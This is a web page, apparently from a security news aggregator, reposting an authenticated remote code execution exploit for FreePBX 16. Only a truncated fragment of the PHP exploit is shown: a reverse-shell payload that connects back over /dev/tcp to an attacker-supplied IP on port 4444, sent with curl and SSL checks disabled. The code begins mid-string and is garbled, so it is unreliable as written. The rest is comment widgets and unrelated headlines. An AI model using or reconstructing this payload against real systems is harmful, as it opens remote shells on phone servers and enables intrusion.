in Business, Security Collections

FreePBX 16 Remote Code Execution

1.9k Views

FreePBX 16 Remote Code Execution

# Exploit Title: FreePBX 16 – Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Cold z3ro
# Date: 6/1/2024
# Tested on: 14,15,16
# Vendor: https://www.freepbx.org/
%26 /dev/tcp/’.$backconnectip.’/4444 0>%261)’);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
echo $response = curl_exec($ch).”\n”;
curl_close($ch);
?>


Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:’yyyy-MM-dd’ }} {{ x.ux * 1000 | date:’HH:mm’ }} CET+1

{{ x.comment }}

What do you think?

0 Points
Upvote Downvote

Leave a Reply

Your email address will not be published. Required fields are marked *

GIPHY App Key not set. Please check settings

A ransomware attack on Synnovis impacted several London hospitals

Gold Pressed Latinum, VBScript, ORBS, Rockwell, Chrome, SKY, Aaran Leyland, and More – SWN #389